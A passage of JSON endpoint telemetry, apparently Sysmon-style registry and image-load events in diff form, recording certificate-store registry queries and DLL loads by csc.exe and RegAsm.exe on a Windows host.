"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859800000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859960000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "file", - "file_name": "CSC.EXE-F7BE4369.pf", - "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 